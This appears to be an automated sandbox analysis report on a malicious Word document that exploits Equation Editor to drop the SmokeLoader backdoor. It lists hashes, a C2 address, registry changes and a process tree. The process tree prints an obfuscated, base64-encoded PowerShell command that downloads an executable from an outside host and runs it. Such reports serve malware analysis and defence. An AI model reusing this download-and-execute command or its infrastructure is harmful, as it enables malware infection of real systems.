Analysis
- max time kernel: 123s
- max time network: 124s
- platform: windows7_x64
- resource: win7v20210410
- submitted: 13-04-2021 09:00
- Static task: static1
- Behavioral task: behavioral1 (sample 2021lk049443.doc, resource win7v20210410)
- Behavioral task: behavioral2 (sample 2021lk049443.doc, resource win10v20210408)
General
- Target: 2021lk049443.doc
- Size: 1.1MB
- MD5: 67cb98b84a7db5f2f69023b0c5c08309
- SHA1: 9f04a27bb59ac6842ea400c95af131612bfe00f9
- SHA256: 6b2e23e38be7ad27c11af03599f5caaf69dff237e39a5ffb1904db398e613221
- SHA512: fd6ad0a85ae2cd37e278c5cf702e67508b606108fd2c5854d52e37574088204db47d015251cde5dd75fe60b155440ed0aa8a735fd9b0fc5d423bda58458fb512
Malware Config
- Extracted: https://u.teknik.io/28oLW.jpg
- Extracted (smokeloader, version 2018), C2: http://94.140.115.43/1/
Signatures

SmokeLoader
Modular backdoor trojan in use since 2014.
Blocklisted process makes network request (4 IoCs)
Processes: EQNEDT32.EXE, powershell.exe
  flow  pid   process
  7     1692  EQNEDT32.EXE
  9     1692  EQNEDT32.EXE
  11    1692  EQNEDT32.EXE
  12    596   powershell.exe

Executes dropped EXE (2 IoCs)
Processes: 69577.exe, eVDwACBtpW.exe
  pid   process
  316   69577.exe
  1448  eVDwACBtpW.exe

Loads dropped DLL (3 IoCs)
Processes: EQNEDT32.EXE, powershell.exe
  pid   process
  1692  EQNEDT32.EXE
  596   powershell.exe
  596   powershell.exe

Maps connected drives based on registry (3 TTPs, 2 IoCs)
Disk information is often read in order to detect sandboxing environments.
Processes: eVDwACBtpW.exe
  description        ioc                                                          process
  Key opened         \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum    eVDwACBtpW.exe
  Key value queried  \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0  eVDwACBtpW.exe

Drops file in System32 directory (2 IoCs)
Processes: powershell.exe, powershell.exe
  description                   ioc                                                                                                                   process
  File opened for modification  C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk  powershell.exe
  File opened for modification  C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk  powershell.exe

Drops file in Windows directory (1 IoCs)
Processes: WINWORD.EXE
  description                   ioc                                process
  File opened for modification  C:\Windows\Debug\WIA\wiatrace.log  WINWORD.EXE
Office loads VBA resources, possible macro or embedded object present

Launches Equation Editor (1 TTPs, 1 IoCs)
Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.

Modifies Internet Explorer settings
Processes: WINWORD.EXE
  description      ioc                                                                                                                                                      process
  Set value (int)  \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1"  WINWORD.EXE
  Key created      \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Toolbar  WINWORD.EXE
  Set value (str)  \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes"  WINWORD.EXE
  Key created      \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt  WINWORD.EXE
  Set value (str)  \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105"  WINWORD.EXE
  Key created      \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel  WINWORD.EXE
  Key created      \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote  WINWORD.EXE
  Set value (int)  \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55"  WINWORD.EXE
  Set value (str)  \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000"  WINWORD.EXE
Suspicious behavior: AddClipboardFormatListener (1 IoCs)
Processes: WINWORD.EXE
  pid   process
  1088  WINWORD.EXE

Suspicious behavior: EnumeratesProcesses (4 IoCs)
Processes: powershell.exe, powershell.exe
  pid  process
  852  powershell.exe (2 events)
  596  powershell.exe (2 events)

Suspicious behavior: MapViewOfSection (2 IoCs)
Processes: eVDwACBtpW.exe
  pid   process
  1448  eVDwACBtpW.exe (2 events)

Suspicious use of AdjustPrivilegeToken (2 IoCs)
Processes: powershell.exe, powershell.exe
  description              pid  process
  Token: SeDebugPrivilege  852  powershell.exe
  Token: SeDebugPrivilege  596  powershell.exe

Suspicious use of FindShellTrayWindow (10 IoCs)
Processes: 69577.exe
  pid  process
  316  69577.exe (10 events)

Suspicious use of SendNotifyMessage (10 IoCs)
Processes: 69577.exe
  pid  process
  316  69577.exe (10 events)

Suspicious use of SetWindowsHookEx (2 IoCs)
Processes: WINWORD.EXE
  pid   process
  1088  WINWORD.EXE (2 events)

Suspicious use of WriteProcessMemory (20 IoCs)
Processes: WINWORD.EXE, EQNEDT32.EXE, 69577.exe, powershell.exe, powershell.exe
  description                                  pid   process         target process
  PID 1088 wrote to memory of 1348 (4 events)  1088  WINWORD.EXE     splwow64.exe
  PID 1692 wrote to memory of 316 (4 events)   1692  EQNEDT32.EXE    69577.exe
  PID 316 wrote to memory of 852 (4 events)    316   69577.exe       powershell.exe
  PID 852 wrote to memory of 596 (4 events)    852   powershell.exe  powershell.exe
  PID 596 wrote to memory of 1448 (4 events)   596   powershell.exe  eVDwACBtpW.exe
Processes (number in brackets is the depth in the process tree)
- [1] C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
  Command line: "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\2021lk049443.doc"
  Signatures: Drops file in Windows directory; Modifies Internet Explorer settings; Suspicious behavior: AddClipboardFormatListener; Suspicious use of SetWindowsHookEx; Suspicious use of WriteProcessMemory
  - [2] C:\Windows\splwow64.exe
    Command line: C:\Windows\splwow64.exe 12288
- [1] C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
  Command line: "C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
  Signatures: Blocklisted process makes network request; Loads dropped DLL; Launches Equation Editor; Suspicious use of WriteProcessMemory
  - [2] C:\Users\Public\69577.exe
    Command line: "C:\Users\Public\69577.exe"
    Signatures: Executes dropped EXE; Suspicious use of FindShellTrayWindow; Suspicious use of SendNotifyMessage; Suspicious use of WriteProcessMemory
    - [3] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      Command line: powershell.exe PowERsHEL`l -ExecutionPolicy Bypass -w 1 /`e IAAoAE4ARQB3AC0AbwBiAGoARQBjAHQAIAAcIGAATgBgAGUAYABUAGAALgBgAFcAYABlAGAAQgBgAEMAYABsAGAAaQBgAGUAYABOAGAAVAAdICkALgBEAG8AdwBuAEwAbwBBAGQAZgBJAGwARQAoACAAHSBoAHQAdABwAHMAOgAvAC8AdQAuAHQAZQBrAG4AaQBrAC4AaQBvAC8AMgA4AG8ATABXAC4AagBwAGcAHSAgACwAIAAdICQARQBOAHYAOgB0AGUAbQBwAFwAZQBWAEQAdwBBAEMAQgB0AHAAVwAuAGUAeABlAB0gIAApACAAOwAgAHMAdABBAFIAdAAgAB0gJABFAE4AdgA6AHQAZQBtAHAAXABlAFYARAB3AEEAQwBCAHQAcABXAC4AZQB4AGUAHSA=
      Signatures: Drops file in System32 directory; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
      - [4] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -w 1 /e IAAoAE4ARQB3AC0AbwBiAGoARQBjAHQAIAAcIGAATgBgAGUAYABUAGAALgBgAFcAYABlAGAAQgBgAEMAYABsAGAAaQBgAGUAYABOAGAAVAAdICkALgBEAG8AdwBuAEwAbwBBAGQAZgBJAGwARQAoACAAHSBoAHQAdABwAHMAOgAvAC8AdQAuAHQAZQBrAG4AaQBrAC4AaQBvAC8AMgA4AG8ATABXAC4AagBwAGcAHSAgACwAIAAdICQARQBOAHYAOgB0AGUAbQBwAFwAZQBWAEQAdwBBAEMAQgB0AHAAVwAuAGUAeABlAB0gIAApACAAOwAgAHMAdABBAFIAdAAgAB0gJABFAE4AdgA6AHQAZQBtAHAAXABlAFYARAB3AEEAQwBCAHQAcABXAC4AZQB4AGUAHSA=
        Signatures: Blocklisted process makes network request; Loads dropped DLL; Drops file in System32 directory; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
        - [5] C:\Users\Admin\AppData\Local\Temp\eVDwACBtpW.exe
          Command line: "C:\Users\Admin\AppData\Local\Temp\eVDwACBtpW.exe"
          Signatures: Executes dropped EXE; Maps connected drives based on registry; Suspicious behavior: MapViewOfSection
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- C:\Users\Admin\AppData\Local\Temp\eVDwACBtpW.exe (also listed as \Users\Admin\AppData\Local\Temp\eVDwACBtpW.exe)
  MD5: 0d1334075336455a13a36fd909417556
  SHA1: 4f1937f0eeeb697ef992547701295134fde65c20
  SHA256: 33d7fa2a8936cc5064b63592b77f87c02fcdc1396395ae2316e3a7c783523ad9
  SHA512: d1f51355db6c4b040196b2588b8f21ef94d11901c7e8ea2c3632622adc791721d044c9a9448c8344406e5cbad2083f140caf9492d3dfef12724d22bb6e549971
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
  MD5: 70c37acc616cbd0d83e7ebfe0b8bc554
  SHA1: 34dc0101703083588ba0803cb1d6c62c43c1cc42
  SHA256: 779d30a8664c519ac47911fb2830e0ae82bbcd936ff1da51c78fefc222df7f22
  SHA512: 1a70beb062ab0d284b2bd870bcb37690d8d25c50f39cf6820983370887314c29d57472eb4bd7ce64e975e1ac2d88253bf435eb6c6e8738d48b0bdb510722e125
- C:\Users\Public\69577.exe (also listed as \Users\Public\69577.exe)
  MD5: 9fbd32c6bb25f6a660696fa9830c5040
  SHA1: 1e41347d36792e823a8982b10170d83a0722e3cc
  SHA256: 5de2819f832f06f69009b07779eacabc1b171540b10689b4b23eaac8f3232e14
  SHA512: 3b89b40676449390bfdc139aad1ac664cf14213eeed32dfa8e06671a8bcc97fe6facd42331657bdc220a9e38fee2021b1ea7a1c2ace6b89ec5d31d488eb2bdfb
Memory dumps (name, file size where reported)
- memory/316-66-0x0000000000000000-mapping.dmp
- memory/596-102-0x0000000006340000-0x0000000006341000-memory.dmp, 4KB
- memory/596-78-0x0000000000000000-mapping.dmp
- memory/596-104-0x000000007EF30000-0x000000007EF31000-memory.dmp, 4KB
- memory/596-103-0x0000000006400000-0x0000000006401000-memory.dmp, 4KB
- memory/596-95-0x0000000006370000-0x0000000006371000-memory.dmp, 4KB
- memory/596-94-0x0000000005830000-0x0000000005831000-memory.dmp, 4KB
- memory/596-89-0x0000000005770000-0x0000000005771000-memory.dmp, 4KB
- memory/596-84-0x0000000004A60000-0x0000000004A61000-memory.dmp, 4KB
- memory/596-85-0x0000000004A62000-0x0000000004A63000-memory.dmp, 4KB
- memory/852-76-0x0000000002590000-0x0000000002591000-memory.dmp, 4KB
- memory/852-70-0x0000000000000000-mapping.dmp
- memory/852-77-0x0000000004750000-0x0000000004751000-memory.dmp, 4KB
- memory/852-72-0x00000000004D0000-0x00000000004D1000-memory.dmp, 4KB
- memory/852-75-0x00000000049A0000-0x00000000049A1000-memory.dmp, 4KB
- memory/852-74-0x0000000004962000-0x0000000004963000-memory.dmp, 4KB
- memory/852-73-0x0000000004960000-0x0000000004961000-memory.dmp, 4KB
- memory/1088-59-0x00000000726F1000-0x00000000726F4000-memory.dmp, 12KB
- memory/1088-61-0x000000005FFF0000-0x0000000060000000-memory.dmp, 64KB
- memory/1088-60-0x0000000070171000-0x0000000070173000-memory.dmp, 8KB
- memory/1088-112-0x000000005FFF0000-0x0000000060000000-memory.dmp, 64KB
- memory/1264-110-0x0000000002CB0000-0x0000000002CB1000-memory.dmp, 4KB
- memory/1264-111-0x0000000002C90000-0x0000000002CA5000-memory.dmp, 84KB
- memory/1348-63-0x000007FEFBBF1000-0x000007FEFBBF3000-memory.dmp, 8KB
- memory/1348-62-0x0000000000000000-mapping.dmp
- memory/1448-107-0x0000000000000000-mapping.dmp
- memory/1692-64-0x00000000753B1000-0x00000000753B3000-memory.dmp, 8KB